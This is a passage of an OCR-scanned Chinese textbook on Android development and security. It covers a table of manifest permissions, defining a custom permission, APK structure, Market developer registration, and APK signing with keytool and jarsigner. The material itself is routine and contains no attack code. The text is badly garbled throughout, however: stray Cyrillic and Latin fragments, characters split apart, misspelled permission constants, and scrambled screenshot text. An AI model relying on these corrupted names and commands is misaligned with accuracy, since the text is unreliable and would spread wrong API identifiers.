«action android:name="android.intent.action.MAIN" /> 
<category android:name="android.intent.category._LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 
<uses-permission android:name="android.permission.SEND_SMS"></uses-permission> 
</manifest> 
在 上 述 代码 中 的 加 粗 斜 体 部 分 ， 功 能 是 声明 该 软件 具备 发 送 短信 的 功能 。 在 Android 系统 中 ， 一 共 定义 
Y 100 多 种 permission 供 开发 人 员 使 用 ， 有 具体 说 明 如 表 10-1 所 示 。 


表 10-1 Android 应 用 程序 权限 说 明 表 


x 能 详细 描述 
访问 登记 属性 pm ， 读 取 或 写 入 登记 check-in 数据 库 属 


android.permission.ACCESS_COARSE_LOCATION， 通 过 WiFi 或 移动 基站 的 方式 获取 用 户 


sa 粗略 的 经 纬度 信息 ， 定 位 精度 大 概 误差 在 30—1500 Ж 

获取 精确 位 置 не n EM MEE 通过 GPS 芯片 接收 卫星 的 定位 信息 ， 定 位 
访问 定位 额外 命令 eem 允许 程序 访问 额外 的 定位 
获取 模拟 定位 信息 Se re 获取 模拟 定位 信息 ， 一 般 用 于 帮助 开发 者 
获取 网 络 状态 пзи 获取 网 络 信息 状态 ， 如 当前 的 网 络 连接 是 


android.permission.ACCESS_SURFACE_FLINGER, Android 平台 上 底层 的 图 形 显示 支持 ， 


访问 Surface Flinger | 般 用 于 游戏 或 照相 机 预览 界面 和 底层 模式 的 屏幕 截图 


ВЭ Android 系统 安全 和 反 编 译 实战 


功 能 详细 描述 

获取 WiFi 状态 android.permission.ACCESS_WIFI STATE, 获取 当前 WiFi 接 入 的 状态 及 WLAN 热点 的 信息 

账户 管理 android.permission.ACCOUNT_MANAGER， 获 取 账 户 验证 信息 ， 主 要 为 GMail 账户 信息 ， 
只 有 系统 级 进程 才能 访问 的 权限 

验证 账户 android.permission.AUTHENTICATE_ ACCOUNTS， 人 允许 一 个 程序 通过 账户 验证 方式 访问 账 
户 管理 ACCOUNT MANAGER 相关 信息 

电量 统计 android.permission.BATTERY_ STATS， 获取 电池 电量 统计 信息 

бри МЕ android.permission.BIND_APPWIDGET， 人 允许 一 个 程序 告诉 appWidget 服务 需要 访问 小 插件 
的 数据 库 ， 只 有 非常 少 的 应 用 才 用 到 此 权限 

AVENA NE = 请 求 系统 管理 员 接收 者 receiver， 只 有 系统 才能 

ее" android.permission.BIND INPUT METHOD ， 请 求 mputMethodService 服务 ， 只 有 系统 才能 


绑 定 RemoteView 


使 用 

android.permission.BIND_REMOTEVIEWS， 必 须 通过 RemoteViewsService 服务 来 请 求 ， 只 
有 系统 才能 用 

android.permission.BIND_WALLPAPER， 必 须 通过 WallpaperService 服务 来 请 求 ， 只 有 系统 


шш 才能 用 

使 用 蓝牙 android.permission.BLUETOOTH， 人 允许 程序 连接 配对 过 的 蓝牙 设备 

蓝牙 管理 android.permission.BLUETOOTH_ADMIN， 人 允许 程序 进行 发 现 和 配对 新 的 蓝牙 设备 
变 成 砖头 android.permission.BRICK， 能 够 禁用 手机 ， 非 常 危险 ， 顾 名 思 义 就 是 让 手机 变 成 砖头 


应 用 删除 时 广播 android.permission.BROADCAST PACKAGE REMOVED， 当 一 个 应 用 在 删除 时 触发 一 个 广播 
收 到 短信 时 广播 android.permission.BROADCAST_SMS， 当 收 到 短信 时 触发 一 个 广播 

连续 广播 android.permission.BROADCAST_STICKY， 人 允许 一 个 程序 收 到 广播 后 快速 收 到 下 一 个 广播 
WAP PUSH 广播 android.permission.BROADCAST_WAP_PUSH，WAP PUSH 服务 收 到 后 触发 一 个 广播 
拨打 电话 android.permission.CALL_PHONE， 人 允许 程序 从 非 系统 拨号 器 里 输入 电话 号 码 

通话 权限 android.permission.CALL_PRIVILEGED， 人 允许 程序 拨打 电话 ， 替 换 系统 的 拨号 器 界面 
拍照 权限 android.permission.CAMERA， 人 允许 访问 摄像 头 进行 拍照 

改变 组 件 状态 android.permission.CHANGE_COMPONENT_ENABLED_STATE， 改 变 组 件 是 否 启用 状态 
改变 配置 android.permission.CHANGE_CONFIGURATION， 人 允许 当前 应 用 改变 配置 ， 如 定位 


改变 网 络 状 态 android.permission.CHANGE_NETWORK_STATE， 改 变 网 络 状态 如 是 否 能 联网 
改变 WiFi 多 播 状态 android.permission.CHANGE_WIFI MULTICAST_STATE， 改 变 WiFi 多 播 状态 
改变 WiFi 状态 android.permission.CHANGE_WIFI STATE, Æ WiFi 状态 

清除 应 用 缓存 android.permission.CLEAR_APP_CACHE， 清 除 应 用 缓存 

清除 用 户 数 据 android.permission.CLEAR_APP_USER_DATA， 清 除 应 用 的 用 户 数 据 

底层 访问 权限 android.permission.CWJ GROUP, ftit CWJ 账户 组 访问 底层 信息 

手机 优化 大 师 扩 展 权限 | android.permission.CELL PHONE _ MASTER_EX， 手 机 优化 大 师 扩展 权限 
控制 定位 更 新 android.permission.CONTROL LOCATION UPDATES， 人 允许 获得 移动 网 络 定位 信息 改变 
删除 缓存 文件 android.permission.DELETE CACHE _FILES， 人 允许 应 用 删除 缓存 文件 

删除 应 用 android.permission.DELETE PACKAGES， 人 允许 程序 删除 应 用 

电源 管理 android.permission.DEVICE POWER， 人 允许 访问 底层 电源 管理 
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功 能 详细 描述 
应 用 诊断 android.permission.DIAGNOSTIC， 人 允许 程序 到 RW 到 诊断 资源 
禁用 键盘 锁 android.permission.DISABLE KEYGUARD， 人 允许 程序 禁用 键盘 锁 
转 存 系统 信息 android.permission.DUMP， 人 允许 程序 获取 系统 dump 信息 从 系统 服务 
状态 栏 控制 android.permission.EXPAND STATUS BAR， 人 允许 程序 扩展 或 收缩 状态 栏 
工厂 测试 模式 android.permission FACTORY TEST， 人 允许 程序 运行 工厂 测试 模式 
使 用 闪光 灯 android.permission.FLASHLIGHT， 人 允许 访问 闪光 灯 
android.permission.FORCE_BACK， 人 允许 程序 强制 使 用 Back 后 退 按 键 ， 无 论 Activity 是 否 在 
强制 后 退 项 层 
访问 账户 Gmail 列表 | android.permission.GET ACCOUNTS, 访问 GMail 账户 列表 
获取 应 用 大 小 android.permission.GET PACKAGE SIZE， 获 取 应 用 的 文件 大 小 
获取 任务 信息 android.permission.GET_TASKS， 人 允许 程序 获取 当前 或 最 近 运 行 的 应 用 
允许 全 局 搜索 android.permission.GLOBAL _SEARCH， 人 允许 程序 使 用 全 局 搜索 功能 
硬件 测试 android.permission.HARDWARE_TEST， 访 问 硬件 辅助 设备 ， 用 于 硬件 测试 
注射 事件 android permission INJECT_EVENTS, 允许 访问 本 程序 的 底层 事件 ， 获 取 按 键 、 轨 迹 球 的 事 
件 流 
安装 定位 提供 android.permission.INSTALL_LOCATION_PROVIDER， 安 装 定位 提供 
安装 应 用 程序 android.permission.INSTALL_PACKAGES， 人 允许 程序 安装 应 用 
内 部 系统 窗口 android.permission.INTERNAL_SYSTEM_WINDOW， 人 允许 程序 打开 内 部 窗口 ， 不 对 第 三 方 


应 用 程序 开放 此 权限 


访问 网 络 android.permission.INTERNET， 访 问 网 络 连接 ， 可 能 产生 GPRS 流量 
android.permission.KILL_BACKGROUND PROCESSES ， 人 允许 程序 调用 killBackground- 


结束 后 台 进 各 Processes(String) 方 法 结束 后 台 进 程 
管理 账户 android.permission.MANAGE_ACCOUNTS， 人 允许 程序 管理 AccountManager 中 的 账户 列表 
管理 程序 引用 android.permission.MANAGE_APP_TOKENS， 管 理 创 建 、 拱 毁 、Z 轴 顺 序 ， 仅 用 于 系统 
高 级 权限 android.permissionMTWEAK_USER， 人 允许 mTweak 用 户 访问 高 级 系统 权限 
社区 权限 android.permissionMTWEAK_FORUM， 人 允许 使 用 mTweak 社区 权限 
软 格式 化 android.permission MASTER_CLEAR， 人 允许 程序 执行 软 格式 化 ， 删 除 系统 配置 信息 
修改 声音 设置 android.permission.MODIFY AUDIO_SETTINGS， 修 改 声 音 设置 信息 

. android.permission.MODIFY_PHONE_STATE， 修 改 电 话 状态 ， 如 飞行 模式 ， 但 不 包含 替换 
Lain 系统 拨号 器 界面 
格式 化 文件 系统 android.permission.MOUNT_FORMAT_FILESYSTEMS， 格 式 化 可 移动 文件 系统 ， 比 如 格式 

化 清空 SD 卡 
挂 载 文 件 系 统 android.permission.MOUNT UNMOUNT FILESYSTEMS， 挂 载 、 反 挂 载 外 部 文件 系统 
允许 NFC 通信 android.permission.NFC， 人 允许 程序 执行 МЕС 近 距离 通信 操作 ， 用 于 移动 支持 
x android.permission.PERSISTENT ACTIVITY, @J# —^4-KAff] Activity， 人 允许 一 个 程序 设置 
永久 Activity : Mp &й 
它 的 Activity 显示 

处 理 拨 出 电话 android.permission.PROCESS_OUTGOING_CALLS， 人 允许 程序 监视 ， 修 改 或 放弃 拨 出 电话 
读 取 日 程 提 醒 android.permission.READ_CALENDAR， 人 允许 程序 读 取 用 户 的 日 程 信息 
读 取 联 系 人 android.permission.READ_CONTACTS， 人 允许 应 用 访问 联系 人 通讯 录 信 息 
屏幕 截图 android.permission.READ FRAME BUFFER， 读 取 帧 缓存 用 于 屏幕 截图 


ВЭЭ Android 系统 安全 和 反 编 译 实战 


功 能 详细 描述 
读 取 收 藏 夹 和 历史 记录 rt 读 取 浏览 器 收藏 夹 和 历史 
读 取 输入 状态 android.permission.READ _INPUT_STATE， 读 取 当 前 键 的 输入 状态 ， 仅 用 于 系统 
读 取 系统 日 志 android.permission.READ_LOGS， 读 取 系 统 底 层 日 志 
读 取 电 话 状 态 android.permission.READ_PHONE_STATE， 访 问 电 话 状态 
读 取 短信 内 容 android.permission.READ SMS， 读 取 短 信 内 容 
读 取 同步 设置 android.permission.READ_SYNC_SETTINGS， 读 取 同 步 设置 ， 读 取 Google 在 线 同步 设置 
读 取 同 步 状态 android.permission.READ_SYNC _STATS， 读 取 同 步 状态 ， 获 得 Google 在 线 同步 状态 
重启 设备 android.permission.REBOOT， 人 允许 程序 重新 启动 设备 
开机 自动 允许 android.permission.RECEIVE BOOT COMPLETED， 人 允许 程序 开机 自动 运行 
接收 彩信 android.permission.RECEIVE MMS， 接收 彩信 
接收 短信 android.permission.RECEIVE_SMS， 接 收 短信 
接收 WAP PUSH android.permission.RECEIVE_WAP_PUSH， 接 收 WAP PUSH 信息 
录音 android.permissionRECORD_AUDIO， 录 制 声音 通过 手机 或 耳机 的 麦克 
排序 系统 任务 android.permission.REORDER_TASKS， 重 新 排序 系统 Z 轴 运 行 中 的 任务 
结束 系统 任务 android.permission.RESTART_PACKAGES， 结 束 任务 通过 restartPackage(String) 方 法 实现 ， 
该 方式 用 于 完全 退出 当前 应 用 程序 
发 送 短信 android.permission.SEND_SMS， 发 送 短 信 
设置 Activity 观察 器 “| android.permissionSET_ACTIVITY_WATCHER, 设置 Activity 观察 器 一 般 用 于 monkey 测试 
设置 闹 铃 提醒 com.android.alarm.permission.SET ALARM， 设 置 闹 铃 提醒 
设置 总 是 退出 android.permission.SET ALWAYS_FINISH， 设 置 程序 在 后 台 是 否 总 是 退出 
设置 动画 缩放 android.permission.SET_ANIMATION_SCALE， 设 置 全 局 动画 缩放 
设置 调试 程序 android.permission.SET_DEBUG_APP， 设 置 调试 程序 ， 一 般 用 于 开发 
设置 屏幕 方向 android.permission.SET_ORIENTATION， 设 置 屏幕 方向 为 横 屏 或 标准 方式 显示 ， 不 用 于 普通 应 用 
android.permission.SET_PREFERRED_APPLICATIONS， 设 置 应 用 的 参数 ， 具 体 查看 add- 
设置 应 用 参数 PackageToPreferred(String) 介绍 
设置 进程 限制 android.permission.SET_PROCESS_LIMIT， 人 允许 程序 设置 最 大 的 进程 数量 的 限制 
设置 系统 时 间 android.permission.SET_TIME， 设 置 系统 时 间 
设置 系统 时 区 android.permission.SET_TIME_ZONE， 设 置 系统 时 区 
设置 桌面 壁纸 android.permission.SET WALLPAPER， 设 置 桌面 壁纸 
设置 壁纸 建议 android.permission.SET WALLPAPER_HINTS， 设 置 壁纸 建议 
发 送 永久 进程 信号 android.permission.SIGNAL PERSISTENT _ PROCESSES， 发 送 一 个 永久 的 进程 信号 
状态 栏 控制 android.permission.STATUS_BAR， 人 允许 程序 打开 、 关 闭 、 禁 用 状态 栏 
访问 订阅 内 容 android.permission SUBSCRIBED_FEEDS_READ, 访问 订阅 信息 的 数据 库 
写 入 订阅 内 容 android.permission.SUBSCRIBED_FEEDS_WRITE， 写 入 或 修改 订阅 内 容 的 数据 库 
显示 系统 窗口 android.permission.SYSTEM_ALERT_WINDOW， 显 示 系 统 窗口 
更 新 设备 状态 android.permission.UPDATE_DEVICE_STATS， 更 新 设备 状态 
使 用 证 书 android.permission.USE_CREDENTIALS， 人 允许 程序 根据 AccountManager 进行 请 求 验证 
使 用 SIP 视频 android.permission.USE_SIP， 人 允许 程序 使 用 SIP 视频 服务 
使 用 振动 android.permission.VIBRATE， 人 允许 振动 
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续 表 
功 能 详细 描述 
唤醒 锁定 android.permission.WAKE_LOCK， 人 允许 程序 在 手机 屏幕 关闭 后 后 台 进程 仍然 运行 
CHA GPRS 接 入 点 设置 | android.permission.WRITE_APN_SETTINGS, SAM GPRS 接 入 点 设置 
写 入 日 程 提 醒 android.permission.WRITE CALENDAR， 写 入 日 程 ， 但 不 可 读 取 
写 入 联系 人 android.permission.WRITE CONTACTS， 写 入 联系 人 ， 但 不 可 读 取 
写 入 外 部 存储 android.permission. WRITE EXTERNAL STORAGE， 人 允许 程序 写 入 外 部 存储 , 如 SD 卡 上 写 文件 


ÆA Google 地 图 数据 | android.permission.WRITE GSERVICES， 人 允许 程序 写 入 Google 地 图 服务 数据 
com.android.browser.permission.WRITE_HISTORY_BOOKMARKS， 写 入 浏览 器 历史 记录 或 


SUR 收藏 夹 ， 但 不 可 读 取 

读 写 系统 敏感 设置 android.permission. WRITE SECURE _ SETTINGS， 人 允许 程序 读 写 系统 安全 敏感 的 设置 项 
读 写 系统 设置 android.permission. WRITE _ SETTINGS， 人 允许 读 写 系统 设置 项 

编写 短信 android.permission.WRITE SMS， 人 允许 编写 短信 


写 入 在 线 同 步 设置 android.permission WRITE_SYNC_SETTINGS, 5 A Google 在 线 同步 设置 
10.2.3 自 定义 一 个 权限 


在 AndroidManifest.xml 文件 中 还 可 以 自 定 义 权 限 ， 其 中 ，permission 就 是 自 定义 权限 的 声明 ， 可 以 用 来 
限制 应 用 程序 中 特殊 组 件 ， 其 特性 在 应 用 程序 内 部 或 者 和 其 他 应 用 程序 之 间 访 问 。 例 如 ， 下 面 演示 了 一 个 
引用 自 定义 权限 的 例子 ， 功 能 是 在 安装 应 用 程序 时 提示 权限 。 

<permission android:label=" 自 定义 权限 " 

android:description="@string/test" 
android:name="com.example.project. TEST" 
android:protectionLevel="normal" 
android:icon="@drawable/ic_launcher"> 

在 上 述 定义 权限 的 代码 中 ， 各 个 声明 的 具体 说 明 如 下 所 示 。 
android:label: 表示 权限 的 名 字 ， 显 示 给 用 户 的 , 值 可 以 是 一 个 string 数 据 , 例如 , 这 里 的 “ 自 定义 权限 ”。 
android:description: 是 一 个 比 label 更 长 的 对 权限 的 描述 。 值 是 通过 resource 文 件 获取 的 ， 不 能 直接 
写 string 值 ， 例 如 这 里 的 @string/test。 
android:name: 表示 权限 的 名 字 ， 如 果 其 他 APP 引 用 该 权限 需要 填写 这 个 名 字 。 
android:protectionLevel: 表示 权限 的 级 别 ， 分 为 4 个 级 别 。 
normal: 表示 低 风 险 权限 ， 在 安装 时 ， 系 统 会 自动 授予 权限 给 application。 
dangerous: 表示 高 风险 权限 ， 系 统 不 会 自动 授予 权限 给 APP， 在 用 到 时 ， 会 给 用 户 提示 。 
signature: 表示 签名 权限 ， 在 其 他 APP 引 用 声明 的 权限 时 ， 需 要 保证 两 个 APP 的 签名 一 致 。 这 样 系 
统 就 会 自动 授予 权限 给 第 三 方 APP， 而 不 提示 给 用 户 。 
signatureOrSystem: 表示 这 个 权限 是 引用 该 权限 的 APP, 需要 有 和 系统 同样 的 签名 才能 授予 的 权限 ， 

- 般 不 推荐 使 用 。 
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ERU 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 10 章 \ 发 布 Android 程序 生成 APK.avi 
当 一 个 Android 项 目 开 发 完毕 后 ， 需 要 打包 和 签名 处 理 成 为 АРК 文件 ， 这 样 才能 放 到 手机 中 使 用 ， 


jid 系统 安全 和 反 编译 实 成 


当然 也 可 以 发 布 到 Market 上 去 赚钱 。 在 本 节 的 内 容 中 ， 将 详细 讲解 打包 、 签 名 、 发 布 Android 程序 的 具 
体 过 程 。 


10.3.1 什么 是 APK 文件 


АРК 是 AndroidPackage 的 缩写 ， 即 Android 安装 包 。APK 是 类 似 Symbian SIS 或 SISX 的 文件 格式 。 通 
过 将 АРК 文件 直接 传 到 Android 模拟 器 或 Android 手机 中 执行 即 可 安装 。APK 文件 和 SIS 一 样 , 把 Android 
SDK 编译 的 工程 打包 成 一 个 安装 程序 文件 , 格式 为 .apk。APK 文件 其 实 是 ZIP 格式 , 但 后 缀 名 被 修改 为 .apk。 
通过 UnZip 解压 后 ， 可 以 看 到 DEX 文件 ，DEX 是 DalvikVM executes 的 简称 ， 即 Android Dalvik 执行 程序 ， 
并 非 Java ME 的 字 节 码 , 而 是 Dalvik 字 节 码 。 Android 在 运行 一 个 程序 时 首先 需要 UnZip, 然后 类 似 Symbian 
那样 直接 ， 和 Windows Mobile 中 的 PE 文件 有 区 别 。 

在 Android 平台 中 ，Dalvik VM 的 执行 文件 被 打包 为 .apk 格式 ， 最 终 运行 时 加 载 器 会 解压 ， 然 后 获取 编 
译 后 的 androidmanifestxml 文件 中 的 permission 分 支 相关 的 安全 访问 。 但 是 此 时 会 仍然 存在 很 多 安全 方面 的 
限制 ， 如 果 将 APK 文件 传 到 /system/app 文件 夹 下 ， 就 会 发 现 最 终 的 执行 是 不 受 限 制 的 ， 安 装 的 文件 可 能 不 
是 这 个 文件 夹 ， 而 是 在 androidrom 中 ， 系 统 的 APK 文件 会 默认 放 入 这 个 文件 夹 ， 它 们 拥有 root 权限 。 

在 Android 平台 中 ， 一 个 合法 的 APK 至 少 需要 包含 如 下 部 分 。 

О 根 目录 下 的 AndroidManifest.xml 文 件 ， 功 能 是 向 Android 系 统 声 明 所 需 Android 权 限 等 运行 应 用 所 需 


的 条 件 。 

О 根 日 录 下 的 classes.dex (dex 指 Dalvik Exceptionable) : #:J% H] (application) 本 身 的 可 执行 文件 (Dalvik 
字 节 码 ) 。 

口 根 目 录 下 的 res 目 录 : 包含 应 用 的 界面 设 定 (如果 仅 是 一 个 后 台 执行 的 service 对 象 ， 则 该 部 分 不 是 必 
WM. 

口 APK 根 目录 下 的 META-INF 目 录 : 该 部 分 是 必需 的 ， 功 能 是 存放 应 用 作者 的 公 钥 证 书 与 应 用 的 数字 
签名 。 


例如 ， 将 10.1.2 节 中 创建 的 APK 文件 first.apk 进行 解压 缩 处 理 , 会 发 现 一 共 含 有 5 个 文件 , 如 图 10-10 
所 示 。 
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图 10-10 解压 缩 first.apk 后 的 效果 
解压 APK 文件 后 ， 各 个 构成 文件 的 具体 说 明 如 下 所 示 。 
口 META-INF\: 这 是 JAR 格 式 文件 的 常见 组 成 部 分 。 
口 res\: 是 存放 资源 文件 的 目录 。 
口 AndroidManifest.xml: 是 Android 应 用 程序 的 全 局 配置 文件 。 
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Ü classes.dex: Dalvik 字 节 码 。 
0 resourcesarsc: 编译 后 的 二 进 制 资源 文件 。 


10.3.2 ”申请 会 员 


开发 完 Android 应 用 程序 后 ， 需 要 去 Market 市 场 申请 成 为 会 员 ， 具 体 流 程 如 下 所 示 。 
СТ) 登录 http://market.android/publish/signup， 如 图 10-11 所 示 。 
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图 10-11 登录 Market 
(2) 单 击 Create an account now 超 链接 ， 来 到 注册 界面 ， 如 图 10-12 所 示 。 
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图 10-12 注册 界面 
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G) 单 击 同意 协议 后 来 到 下 一 步 界面 ， 在 此 输入 手机 号 码 ， 如 图 10-13 所 示 。 
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图 10-13 输入 手机 号 码 


(4) 在 新 界面 中 输入 手机 获取 的 验证 码 ， 如 图 10-14 所 示 。 
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图 10-14 ”输入 验证 码 
(5) 验证 通过 后 ， 在 新 界面 中 继续 输入 信息 ， 如 图 10-15 所 示 。 
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(6) 单 击 Continue 按钮 后 ， 提 示 需 要 花费 25 美元 ， 支 付 后 才能 成 为 正式 会 员 ， 如 图 10-16 所 示 。 
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图 10-16 需要 支付 界面 
CD mh =®@ШШЕ 近 乌 来 到 支付 界面 ， 如 图 10-17 所 示 。 


1 Android - Developer Registration Fee for byzny123@012 com 42500 а 
Subtotal: $25.00 


Shipping and Tas ssloulates on ned page 


Add a credit card to your Сох d Account to continue 
Shop confidently with Google Ci 
Sk us now am el 109 toten om creuhrze purchases while 
shopping at stores across tne wea. 
Email bjrzny1236/125. com Sin on a terar ише 
Location [sn ————— | 
Don see your country? Learn Move 
Card numbor [E———————— 
== == 
Expiration date: Month Ej/[Year E] cve: [waste mice 


Cardhelder name [E] 
Bling Абос CO 


City/Town: 


Stato: [Rie име = 
Zo (21 


"яй 


пж 
图 10-17 支付 界面 
在 此 输入 信用 卡 信息 ， 完 成 支付 后 即 可 成 为 正式 会 员 。 


10.3.3 ”生成 签名 文件 


Android 应 用 程序 的 签名 和 Symbian 程序 的 类 似 , 都 可 以 使 用 自己 签名 (Self-signed) 的 方式 .制作 Android 
签名 文件 的 方法 有 两 种 ， 具 体 说 明 如 下 所 示 。 

1. 命令 行 生成 方式 

使 用 命令 行 方式 生成 签名 的 具体 流程 如 下 所 示 。 
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(1) CMD 命令 如 下 。 
keytool -genkey -alias android123.keystore -keyalg RSA -validity 20000 -keystore android123.keystore 
然后 依次 提示 用 户 输入 如 下 信息 。 
输入 keystore 密码 : [密码 不 回 显 ] 
再 次 输入 新 密码 : [密码 不 回 显 ] 
您 的 名 字 与 姓氏 是 什么 ? 
[Unknown]: android123 
您 的 组 织 单位 名 称 是 什么 ? 
[Unknown]: www.android123.com.cn 
您 的 组 织 名 称 是 什么 ? 
[Unknown]: www.android123.com.cn 
您 的 组 织 名 称 是 什么 ? 
[Unknown]: www.android123.com.cn 
您 所 在 的 城市 或 区 域名 称 是 什么 ? 
[Unknown]: New York 
您 所 在 的 州 或 省 份 名 称 是 什么 ? 
[Unknown]: New York 
该 单位 的 两 字母 国家 代码 是 什么 
[Unknown]: CN 
CN=android123, OU=www.android123.com.cn, O=www.android123.com.cn, L=New York, ST=New York, 
C=CN 正确 吗 ? 
[eh Y 
输入 <android123.keystore> 的 主 密码 (如 果 和 keystore 密码 相同 ， 按 回 车 ) : 
Kh, 参数 -validity 表示 证 书 有 效 天 数 , 这 里 设 为 200 Ж. 还 有 在 输入 密码 时 没有 回 显 ， 只 需 输 入 即 可 ， 

- 般 位 数 建议 为 20 位 ， 最 后 需要 记 下 来 后 面 还 要 用 。 接 下 来 就 可 以 为 APK 文件 签名 了 。 

(2) 执行 以 下 命令 。 
jarsigner -verbose -keystore android123.keystore -signedjar android123 signed.apk android123.apk 
android123.keystore 
这 样 就 可 以 生成 签名 的 APK 文件 , 假设 输入 文件 android123.apk,， 则 最 终生 成 android123. signed.apk 为 

Android 签名 后 的 APK 执行 文件 。 


注意 : keytool 用 法 和 jarsigner 用 法 总 结 。 


(1) keytool 用 法 

-certreq [-v] [-protected] 
[-alias < 别名 >] [-sigalg <sigalg>] 
[-file <csr_file>] [-keypass < 密 钥 库 口 令 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] .… 
[-providerpath < 路 径 列表 >] 


-changealias [-v] [-protected] -alias < 别名 > -destalias < 目标 别名 > 


[-keypass < 密 钥 库 口 令 >] 
e 
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[keystore < 密 钥 库 >] [-storepass < 存储 库 口 令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] .… 
[-providerpath < 路 径 列 表 >] 


-delete [-v] [-protected] -alias < 别名 > 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] ... 
[-providerpath < 路 径 列 表 >] 


-exportcert [-v] [-rfc] [-protected] 
[-alias < 别名 >] [-file < 认证 文件 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] … 
[-providerpath < 路 径 列 表 >] 


-genkeypair [-v] [-protected] 
[-alias < 别名 >] 
[-keyalg <keyalg>] [-keysize < 密 钥 大 小 >] 
[-sigalg <sigalg>] [-dname <dname>] 
[-validity <valDays>] [-keypass < 密 钥 库 口令 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] ... 
[-providerpath < 路 径 列 表 >] 


-genseckey [-v] [-protected] 
[-alias < 别名 >] [-keypass < 密 钥 库 口令 >] 
[-keyalg <keyalg>] [-keysize < 密 钥 大 小 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口 令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] … 


[-providerpath < 路 径 列 表 >] 

-help 

-importcert [-v] [-noprompt] [-trustcacerts] [-protected] 
[-alias < 别名 >] 


[-file < 认证 文件 >] [-keypass < 密 钥 库 口令 >] 

[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] ... 
[-providerpath < 路 径 列表 >] 
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-importkeystore [-v] 
[-srckeystore < 源 密 钥 库 >] [-destkeystore < 目标 密 钥 库 >] 
[-srcstoretype < 源 存 储 类 型 >] [-deststoretype < 目标 存储 类 型 >] 
[-srestorepass < 源 存储 库 口令 >] [-deststorepass < 目标 存储 库 口 令 >] 
[-srcprotected] [-destprotected] 
[-srcprovidername < 源 提供 方 名 称 >] 
[-destprovidername < 目标 提供 方 名 称 >] 
[-srcalias < 源 别名 > [-destalias < 目标 别名 >] 
[-srckeypass < 源 密 钥 库 口令 >] [-destkeypass < 目标 密 钥 库 口 令 >]] 
[-noprompt] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] .… 
[-providerpath < 路 径 列 表 >] 


-keypasswd [-v][-alias < 别名 >] 
[-keypass < 旧 密 钥 库 口令 >] [-new < 新 密 钥 库 口 令 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口 令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] ... 
[-providerpath < 路 径 列 表 >] 


-list [-v | -rfc] [-protected] 
[-alias < 别名 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] ... 
[-providerpath < 路 径 列 表 >] 


-printcert — [-v] [-file < 认证 文件 >] 


-storepasswd [-v] [-new < 新 存储 库 口 令 >] 
[-keystore < 密 钥 库 >] [-storepass < 存储 库 口令 >] 
[-storetype < 存储 类 型 >] [-providername < 名 称 >] 
[-providerclass < 提供 方 类 名 称 > [-providerarg < 参数 >]] .… 
[-providerpath < 路 径 列 表 >] 

(2) jarsigner 用 法 
[选项 ] jar 文件 别名 
jarsigner -verify [选项 ] jar 文件 


[-keystore <url>] 密 钥 库 位 置 

[-storepass < 口令 >] 用 于 密 钥 库 完 整 性 的 口令 
[-storetype < 类 型 >] 密 钥 库 类 型 

[-keypass < 口令 >] 专用 密 钥 的 口令 (如 果 不 同 ) 
[-sigfile < 文件 >] .SF/.DSA 文件 的 名 称 
[-signedjar < 文件 >] 已 签名 的 JAR 文件 的 名 称 
[-digestalg < 算法 >] 摘要 算法 的 名 称 
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-sigalg < 算法 >] 签名 算法 的 名 称 
-verify] 验证 已 签名 的 JAR 文件 
-verbose] 签名 /验证 时 输出 详细 信息 
-certs] 输出 详细 信息 和 验证 时 显示 证 书 
-tsa <url>] 时 间 惟 机 构 的 位 置 
-tsacert < 别名 >] 时 间 惟 机构 的 公共 密 钥 证 书 
-altsigner< 类 >] 替代 的 签名 机 制 的 类 名 
-altsignerpath < 路 径 列表 >] 替代 的 签名 机 制 的 位 置 
-internalsf] 在 签名 块 内 包含 .SF 文件 
-sectionsonly] 不 计算 整个 清单 的 散 列 
-protected] 密 钥 库 已 保护 验证 路 径 
[-providerName < 名 称 >] 提供 者 名 称 
-providerClass < 类 > 加 密 服务 提供 者 的 名 称 
-providerArg < 参数 >]] ... 主 类 文件 和 构造 函数 参数 


2. 使 用 Eclipse 的 ADT 生成 


实际 上 ， 使 用 Eclipse 可 以 更 加 直观 、 方 便 地 生成 签名 文件 ， 具 体 流程 如 下 所 示 。 
(1) 右 击 Eclipse 项 目 名 ， 在 弹出 的 快捷 菜单 中 依次 选择 Android Tools | Export Signed Application 
Package.… 命 令 ， 如 图 10-18 所 示 。 


Restore from Local History _ ls _- annale manitinioading annale x 
d Bev Test Project, 
SF New Resource File... 


Properties AlttEnter 


[2010-06-14 14:12: 
Export Unsi лед Application Package... 
Мр a 


图 10-18 选择 导出 


(2) 在 弹出 界面 中 选择 要 导出 的 项 目 ， 在 此 选择 10.1 节 实现 的 first 项 目 ， 如 图 10-19 所 示 。 
(3) 单 击 Next 按钮 , 在 弹出 的 界面 中 选中 Create new keystore 单 选 按钮 ， 然 后 分 别 输入 文件 名 和 密码 ， 
如 图 10-20 所 示 。 


